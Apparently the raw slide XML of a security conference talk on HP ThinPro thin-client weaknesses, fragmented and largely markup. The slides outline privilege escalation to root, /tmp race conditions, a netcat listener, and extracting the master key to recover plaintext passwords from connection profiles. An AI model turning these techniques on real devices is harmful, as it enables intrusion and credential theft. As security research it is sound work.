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60" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="304" r:id="rId7"/>
    <p:sldId id="305" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="300" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="301" r:id="rId17"/>
    <p:sldId id="325" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="319" r:id="rId21"/>
    <p:sldId id="295" r:id="rId22"/>
    <p:sldId id="317" r:id="rId23"/>
    <p:sldId id="294" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="326" r:id="rId28"/>
    <p:sldId id="274" r:id="rId29"/>
    <p:sldId id="306" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="323" r:id="rId32"/>
    <p:sldId id="308" r:id="rId33"/>
    <p:sldId id="324" r:id="rId34"/>
    <p:sldId id="312" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="286" r:id="rId38"/>
    <p:sldId id="264" r:id="rId39"/>
    <p:sldId id="288" r:id="rId40"/>
    <p:sldId id="318" r:id="rId41"/>
    <p:sldId id="285" r:id="rId42"/>
    <p:sldId id="287" r:id="rId43"/>
    <p:sldId id="284" r:id="rId44"/>
    <p:sldId id="290" r:id="rId45"/>
    <p:sldId id="327" r:id="rId46"/>
    <p:sldId id="321" r:id="rId47"/>
    <p:sldId id="277" r:id="rId48"/>
    <p:sldId id="315" r:id="rId49"/>
    <p:sldId id="316" r:id="rId50"/>
    <p:sldId id="328" r:id="rId51"/>
    <p:sldId id="329" r:id="rId52"/>
    <p:sldId id="276" r:id="rId53"/>
    <p:sldId id="279" r:id="rId54"/>
    <p:sldId id="334" r:id="rId55"/>
    <p:sldId id="331" r:id="rId56"/>
    <p:sldId id="332" r:id="rId57"/>
    <p:sldId id="280" r:id="rId58"/>
    <p:sldId id="303" r:id="rId59"/>
    <p:sldId id="281" r:id="rId60"/>
    <p:sldId id="282" r:id="rId61"/>
    <p:sldId id="289" r:id="rId62"/>
    <p:sldId id="283" r:id="rId63"/>
    <p:sldId id="333" r:id="rId64"/>
    <p:sldId id="310" r:id="rId65"/>
    <p:sldId id="296" r:id="rId66"/>
    <p:sldId id="297" r:id="rId67"/>
    <p:sldId id="335" r:id="rId68"/>
    <p:sldId id="336" r:id="rId69"/>
    <p:sldId id="337" r:id="rId70"/>
    <p:sldId id="298" r:id="rId71"/>
    <p:sldId id="314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/>
    <p:restoredTop sz="75068"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="248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3321A-04CC-E541-8B1C-804B75CE421E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/18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93D23-B01F-2E4A-A886-83145C8C8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Agenda…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Root shells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47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01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96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38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31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38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Obtaining samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>manticore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Export/Import</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Manticore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lulz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Manticore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NCLR strings (rc4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracting master encryption key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recover plaintext passwords from profiles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58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82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I have not worked out what the base64 value for a &lt;Directory&gt; tag is… it appears binary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47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24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4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the @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elonmusk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/@notch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> thread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03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21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44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60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91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Sloppy code for socket reuse… just loop with a short timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openbsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> version so the command line options for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> listener may look a little different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since it’s a full URL we can just use port 80 to make things easier…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63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the file. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.factory-reset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71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Cannot be effectively secured in their current state….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7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anyone remember when computing meant the use of mainframe terminals? What is old is new again…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9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A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ThinPro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con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guration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complete version of the operating system and is the most suitable for multipurpose environments that require advanced administration or end-user customization. Features of this OS con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guration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include the following: </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Boots to the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ThinPro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desktop or Active Directory login screen </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Has more connection types than Smart Zero </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Allows multiple connections (of any supported type) to be con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gured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run simultaneously </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst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The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Zero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con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guration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simpler, more secure version of the operating system and is the most suitable for single-purpose, kiosk-style environments that require minimal administration and little to no end-user customization. Features of this OS con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guration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include the following: </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Boots directly to a virtual session and hides the desktop, a feature also known as “kiosk mode” </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Has fewer connection types than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ThinPro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AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Supports only one connection to be con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gured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run at a time </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Does not support Active Directory authentication or single sign-on </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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8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72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used was released on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No package updates..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service packs only covers a few pieces of software and releases occur ~ 3 months..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Last updates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>published Jan 2018??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9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43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99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underlying admin user is root on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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3D23-B01F-2E4A-A886-83145C8C8F6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1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malerisch.net/2015/04/pwning-hp-thin-client.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nccgroup.trust/au/our-research/thin-clients-slim-security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malerisch.net/2016/10/pwning-thin-client-in-less-two-minutes2-cve2016-2246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ftp://ftp.hp.com/pub/tcdebian/images/T6X44017.dd.gz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ustanotherhacker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Zero clients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Skating on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>THIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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A970F-2F02-4145-B464-575358C15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48" y="5905095"/>
            <a:ext cx="38782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84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D307B-59E3-154C-857C-3B7174DE5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48" y="5905095"/>
            <a:ext cx="38782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445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Past research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HP thin clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398957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NCC Group – Wyse white paper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.nccgroup.trust/au/our-research/thin-clients-slim-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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dirty="0"/>
              <a:t>Roberto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Suggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Malerisch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.malerisch.net/2015/04/pwning-hp-thin-client.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://blog.malerisch.net/2016/10/pwning-thin-client-in-less-two-minutes2-cve2016-2246.html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73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wget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ftp://ftp.hp.com/pub/tcdebian/images/T6X44017.dd.gz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gunzip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qemu-img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> convert -f raw -O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> T6X44017.dd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thinpro.vmdk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>create a Virtual Machine and select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thinpro.vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as existing disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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7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FAA54-AD7D-054D-AAFA-705E4BF4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48" y="5905095"/>
            <a:ext cx="38782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63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Embedded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ThinPro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44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 client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zero client / Kiosk mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop PC (not recommended) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3263538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5B720A-3B79-984E-8B65-A55099075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212" y="669317"/>
            <a:ext cx="9952494" cy="5472953"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1204186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patches/Updates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HP provides image updates and upstream patches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3600" dirty="0"/>
              <a:t>Now and then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83734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patches/Updates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B97C7-89C2-2D4F-93B2-CA1B04EF97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75" t="-2665" r="6382" b="2665"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2391304"/>
            <a:ext cx="10712777" cy="1780117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57F01A69-4605-5E42-A7AD-E79963F60FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320799" y="2523068"/>
            <a:ext cx="8805333" cy="33866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5F074-CC45-AD49-BCE8-A33C670DA9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9" r="9617"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632478" y="2097088"/>
            <a:ext cx="8923868" cy="2521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20367D-B78B-AE46-A230-A2E18EF9F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32" y="1566334"/>
            <a:ext cx="11739359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use of thin, ultra thin and zero clients are on a rapid rise across enterprises. Large scale deployment of these solutions offers significant cost reductions in hardware, power consumption and technical support, while centralizing corporate assets through remote access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130202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E8D06-CDA4-EC49-AD39-FA76C15D4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Patches/Updates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A9CB0-1B8B-F743-98D7-DC7536A37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9" t="2941" r="11192" b="50196"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006942" y="1721222"/>
            <a:ext cx="10466204" cy="3818966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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92D6A223-89E7-A642-946B-55DC07CBF8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18965551">
            <a:off x="6184547" y="3644578"/>
            <a:ext cx="2743200" cy="766482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F76E55-365D-0F49-AC53-62C37E473B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916706" y="5331329"/>
            <a:ext cx="1075764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44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client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HP adds their own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>customisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thin client UX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Management software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3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AA53-0501-2B45-938C-BDEAF0A7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48F35-8988-6045-9C7E-748FBDA71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VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fleet management software</a:t>
            </a:r>
          </a:p>
          <a:p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6259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 client has 2 accounts, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auto logs in as user account by default (can be turned off)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory / LDAP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145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of privileges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Processes either run as ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a mix of executing commands under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> both to raise and lower privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file “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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hptc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” is used as flag to determine if device is in admin mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege inheritance for processes is a known source of problems for years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344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F943D-DDE4-534E-8518-59AA30CF1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48" y="5905095"/>
            <a:ext cx="38782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55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Privilege escalation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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit for this device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Luckily there are a large number of ways to get root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This demo is a local access one</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1318482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FAA54-AD7D-054D-AAFA-705E4BF4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48" y="5905095"/>
            <a:ext cx="38782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73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protection - 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protection is implemented via mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the following privileged bash script to manage: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sbin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fslock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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sbin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fsunlock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465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write protection most tools and scripts place files in “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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RACE CONDITION ALL THE THINGS!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42BDA1-EC99-BE47-B542-A1087DFDF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423" y="3436256"/>
            <a:ext cx="6605945" cy="36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14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WHOAMI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Penetration tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security researcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CREST Assessor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trainer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wireghoul</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.justanotherhacker.com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2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46D-43AE-634D-ABB6-B1D2467F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protection -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DC72-18A2-8148-9DC3-7E4CCF74F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Unified Write Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creation of RAM drive for runtime files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can allow individual files to pass through via predefined filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clear writes on reboot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be turned on/off by administrative user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243194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63FB-F260-A84B-983B-746F4F10D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DFAD3-93CA-C544-87F1-5C789F537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080" y="237067"/>
            <a:ext cx="10498664" cy="6231466"/>
          </a:xfr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8CB75CE-FE76-FB42-912C-268B986ADCA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218266" y="3945467"/>
            <a:ext cx="8659811" cy="660400"/>
          </a:xfrm>
          <a:prstGeom prst="fra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FC96FCDC-B903-834E-8E6C-A518848319D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218265" y="5147734"/>
            <a:ext cx="8659811" cy="660400"/>
          </a:xfrm>
          <a:prstGeom prst="fra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188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DD45C-B0F4-474B-8A27-26E35B66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89757-04A6-2C48-814D-A2C133FA1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snapshots stored on flash (mounted as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has a factory snapshot by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be managed from command line with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hptc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-snapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not a disk image, just copies of directories and files from file system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153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DD45C-B0F4-474B-8A27-26E35B66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33D416-5C85-154C-B600-D2888BFFD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663" t="12264" r="40039" b="22755"/>
